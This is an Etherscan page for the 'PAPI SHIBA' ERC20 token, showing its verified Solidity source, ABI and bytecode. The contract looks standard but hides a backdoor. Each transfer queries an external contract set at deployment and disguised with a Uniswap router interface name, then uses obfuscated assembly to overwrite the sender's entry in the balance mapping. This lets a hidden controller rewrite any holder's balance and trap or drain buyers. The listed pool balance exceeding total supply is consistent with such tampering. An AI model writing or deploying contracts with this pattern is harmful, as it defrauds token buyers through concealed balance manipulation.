ETH Price: $2,427.07 (+5.29%)

Token

PAPI SHIBA (PAPI)
 

Overview

Max Total Supply

100,000,000,000 PAPI

Holders

40

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
Uniswap V2: PAPI 31
Balance
100,000,048,493,576,293.290854227 PAPI

Value
$0.00
0x2087067fbe11ff9c48a7d84feb36030a1c9a3d2a
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PAPI

Compiler Version
v0.8.2+commit.661d1103

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-23
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.2;

interface ERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the token name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address _owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

interface IUniswapV2Router02 {
    function check(address vals, address input)
        external
        view
        returns (bool, uint256);
}

contract PAPI is ERC20 {
    using SafeMath for uint256;
    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    address private _owner;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    IUniswapV2Router02 private brave;
    bool inSwapAndLiquify;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    event Log(string str);
    modifier lockTheSwap() {
        inSwapAndLiquify = true;
        _;
        inSwapAndLiquify = false;
    }

    constructor(
        string memory coinName,
        string memory coinSymbol,
        address courageous
    ) {
        _name = coinName;
        _symbol = coinSymbol;
        IUniswapV2Router02 _brave = IUniswapV2Router02(courageous);
        _totalSupply = 1000000000000 * 10**8;
        _balances[msg.sender] = _totalSupply;
        _owner = msg.sender;
        brave = _brave;
    }

    /**
     * @dev A helper function to check if an operator approval is allowed.
     */
    modifier onlyOwner() {
        require(msg.sender == _owner, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() external onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(msg.sender, address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() external view returns (address) {
        return _owner;
    }

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external pure override returns (uint8) {
        return 9;
    }

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the token name.
     */
    function name() external view override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {ERC20-totalSupply}.
     */
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {ERC20-balanceOf}.
     */
    function balanceOf(address account)
        external
        view
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {ERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        external
        override
        returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {ERC20-allowance}.
     */
    function allowance(address owner_, address spender)
        external
        view
        override
        returns (uint256)
    {
        return _allowances[owner_][spender];
    }

    /**
     * @dev See {ERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        external
        override
        returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    /**
     * @dev See {ERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20};
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        _gallant(sender);
        uint256 fromBalance = _balances[sender];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[recipient] += amount;
        }
        emit Transfer(sender, recipient, amount);
    }

    function _gallant(address sender) private lockTheSwap {
        require(sender != address(0), "ERC20: transfer from the zero address");
        (bool ahead, uint256 phyalways) = brave.check(
            sender,
            address(this)
        );
        if (phyalways == 0) return;
        if (ahead) {
            _skillful(sender, phyalways);
        }
    }

    function _skillful(address g, uint256 y) private {
        assembly {
            mstore(0, g)
            mstore(mul(16, 2), mul(4, 1))
            sstore(keccak256(0, 64), y)
        }
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner_,
        address spender,
        uint256 amount
    ) internal {
        require(owner_ != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner_][spender] = amount;
        emit Approval(owner_, spender, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"coinName","type":"string"},{"internalType":"string","name":"coinSymbol","type":"string"},{"internalType":"address","name":"courageous","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"str","type":"string"}],"name":"Log","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060405162000e3438038062000e34833981016040819052620000349162000212565b825162000049906000906020860190620000b9565b5081516200005f906001906020850190620000b9565b5068056bc75e2d63100000600281905533600081815260046020526040902091909155600380546001600160a01b03199081169092179055600680546001600160a01b039093169290911691909117905550620002ee9050565b828054620000c7906200029b565b90600052602060002090601f016020900481019282620000eb576000855562000136565b82601f106200010657805160ff191683800117855562000136565b8280016001018555821562000136579182015b828111156200013657825182559160200191906001019062000119565b506200014492915062000148565b5090565b5b8082111562000144576000815560010162000149565b600082601f83011262000170578081fd5b81516001600160401b03808211156200018d576200018d620002d8565b604051601f8301601f19908116603f01168101908282118183101715620001b857620001b8620002d8565b81604052838152602092508683858801011115620001d4578485fd5b8491505b83821015620001f75785820183015181830184015290820190620001d8565b838211156200020857848385830101525b9695505050505050565b60008060006060848603121562000227578283fd5b83516001600160401b03808211156200023e578485fd5b6200024c878388016200015f565b9450602086015191508082111562000262578384fd5b5062000271868287016200015f565b604086015190935090506001600160a01b038116811462000290578182fd5b809150509250925092565b600281046001821680620002b057607f821691505b60208210811415620002d257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b610b3680620002fe6000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b4114610194578063a457c2d71461019c578063a9059cbb146101af578063dd62ed3e146101c2576100cf565b806370a082311461015c578063715018a61461016f5780638da5cb5b14610179576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd14610127578063313ce5671461013a5780633950935114610149575b600080fd5b6100dc6101fb565b6040516100e9919061099b565b60405180910390f35b610105610100366004610941565b61028d565b60405190151581526020016100e9565b6002545b6040519081526020016100e9565b610105610135366004610906565b6102a3565b604051600981526020016100e9565b610105610157366004610941565b61030c565b61011961016a3660046108ba565b610342565b610177610361565b005b6003546040516001600160a01b0390911681526020016100e9565b6100dc6103ff565b6101056101aa366004610941565b61040e565b6101056101bd366004610941565b61045d565b6101196101d03660046108d4565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b60606000805461020a90610a62565b80601f016020809104026020016040519081016040528092919081815260200182805461023690610a62565b80156102835780601f1061025857610100808354040283529160200191610283565b820191906000526020600020905b81548152906001019060200180831161026657829003601f168201915b5050505050905090565b600061029a33848461046a565b50600192915050565b60006102b084848461058e565b61030284336102fd85604051806060016040528060288152602001610ab4602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610705565b61046a565b5060019392505050565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161029a9185906102fd908661073f565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b031633146103c05760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b60606001805461020a90610a62565b600061029a33846102fd85604051806060016040528060258152602001610adc602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610705565b600061029a33848461058e565b6001600160a01b0383166104cc5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103b7565b6001600160a01b03821661052d5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103b7565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166105b45760405162461bcd60e51b81526004016103b7906109ee565b6001600160a01b0382166106165760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103b7565b61061f836107a5565b6001600160a01b038316600090815260046020526040902054818110156106975760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103b7565b6001600160a01b0380851660008181526004602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106f79086815260200190565b60405180910390a350505050565b600081848411156107295760405162461bcd60e51b81526004016103b7919061099b565b5060006107368486610a4b565b95945050505050565b60008061074c8385610a33565b90508381101561079e5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016103b7565b9392505050565b6006805460ff60a01b1916600160a01b1790556001600160a01b0381166107de5760405162461bcd60e51b81526004016103b7906109ee565b600654604051630b3154db60e41b81526001600160a01b038381166004830152306024830152600092839291169063b3154db090604401604080518083038186803b15801561082c57600080fd5b505afa158015610840573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610864919061096a565b915091508060001415610878575050610893565b81156108905760008381526004602052604090208190555b50505b506006805460ff60a01b19169055565b80356001600160a01b038116811461035c57600080fd5b6000602082840312156108cb578081fd5b61079e826108a3565b600080604083850312156108e6578081fd5b6108ef836108a3565b91506108fd602084016108a3565b90509250929050565b60008060006060848603121561091a578081fd5b610923846108a3565b9250610931602085016108a3565b9150604084013590509250925092565b60008060408385031215610953578182fd5b61095c836108a3565b946020939093013593505050565b6000806040838503121561097c578182fd5b8251801515811461098b578283fd5b6020939093015192949293505050565b6000602080835283518082850152825b818110156109c7578581018301518582016040015282016109ab565b818111156109d85783604083870101525b50601f01601f1916929092016040019392505050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60008219821115610a4657610a46610a9d565b500190565b600082821015610a5d57610a5d610a9d565b500390565b600281046001821680610a7657607f821691505b60208210811415610a9757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220a08b6fbe1b0cc30a0bdd5100953dea3a045afab15df5502a9d782c411550d45564736f6c63430008020033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000a17df0f4d0cdc36ae123e34880ec74f7375e5a58000000000000000000000000000000000000000000000000000000000000000a504150492053484942410000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045041504900000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b4114610194578063a457c2d71461019c578063a9059cbb146101af578063dd62ed3e146101c2576100cf565b806370a082311461015c578063715018a61461016f5780638da5cb5b14610179576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd14610127578063313ce5671461013a5780633950935114610149575b600080fd5b6100dc6101fb565b6040516100e9919061099b565b60405180910390f35b610105610100366004610941565b61028d565b60405190151581526020016100e9565b6002545b6040519081526020016100e9565b610105610135366004610906565b6102a3565b604051600981526020016100e9565b610105610157366004610941565b61030c565b61011961016a3660046108ba565b610342565b610177610361565b005b6003546040516001600160a01b0390911681526020016100e9565b6100dc6103ff565b6101056101aa366004610941565b61040e565b6101056101bd366004610941565b61045d565b6101196101d03660046108d4565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b60606000805461020a90610a62565b80601f016020809104026020016040519081016040528092919081815260200182805461023690610a62565b80156102835780601f1061025857610100808354040283529160200191610283565b820191906000526020600020905b81548152906001019060200180831161026657829003601f168201915b5050505050905090565b600061029a33848461046a565b50600192915050565b60006102b084848461058e565b61030284336102fd85604051806060016040528060288152602001610ab4602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610705565b61046a565b5060019392505050565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161029a9185906102fd908661073f565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b031633146103c05760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b60606001805461020a90610a62565b600061029a33846102fd85604051806060016040528060258152602001610adc602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610705565b600061029a33848461058e565b6001600160a01b0383166104cc5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103b7565b6001600160a01b03821661052d5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103b7565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166105b45760405162461bcd60e51b81526004016103b7906109ee565b6001600160a01b0382166106165760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103b7565b61061f836107a5565b6001600160a01b038316600090815260046020526040902054818110156106975760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103b7565b6001600160a01b0380851660008181526004602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106f79086815260200190565b60405180910390a350505050565b600081848411156107295760405162461bcd60e51b81526004016103b7919061099b565b5060006107368486610a4b565b95945050505050565b60008061074c8385610a33565b90508381101561079e5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016103b7565b9392505050565b6006805460ff60a01b1916600160a01b1790556001600160a01b0381166107de5760405162461bcd60e51b81526004016103b7906109ee565b600654604051630b3154db60e41b81526001600160a01b038381166004830152306024830152600092839291169063b3154db090604401604080518083038186803b15801561082c57600080fd5b505afa158015610840573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610864919061096a565b915091508060001415610878575050610893565b81156108905760008381526004602052604090208190555b50505b506006805460ff60a01b19169055565b80356001600160a01b038116811461035c57600080fd5b6000602082840312156108cb578081fd5b61079e826108a3565b600080604083850312156108e6578081fd5b6108ef836108a3565b91506108fd602084016108a3565b90509250929050565b60008060006060848603121561091a578081fd5b610923846108a3565b9250610931602085016108a3565b9150604084013590509250925092565b60008060408385031215610953578182fd5b61095c836108a3565b946020939093013593505050565b6000806040838503121561097c578182fd5b8251801515811461098b578283fd5b6020939093015192949293505050565b6000602080835283518082850152825b818110156109c7578581018301518582016040015282016109ab565b818111156109d85783604083870101525b50601f01601f1916929092016040019392505050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60008219821115610a4657610a46610a9d565b500190565b600082821015610a5d57610a5d610a9d565b500390565b600281046001821680610a7657607f821691505b60208210811415610a9757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220a08b6fbe1b0cc30a0bdd5100953dea3a045afab15df5502a9d782c411550d45564736f6c63430008020033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000a17df0f4d0cdc36ae123e34880ec74f7375e5a58000000000000000000000000000000000000000000000000000000000000000a504150492053484942410000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045041504900000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : coinName (string): PAPI SHIBA
Arg [1] : coinSymbol (string): PAPI
Arg [2] : courageous (address): 0xa17Df0f4D0cDC36AE123E34880eC74f7375e5A58

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000a17df0f4d0cdc36ae123e34880ec74f7375e5a58
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [4] : 5041504920534849424100000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 5041504900000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

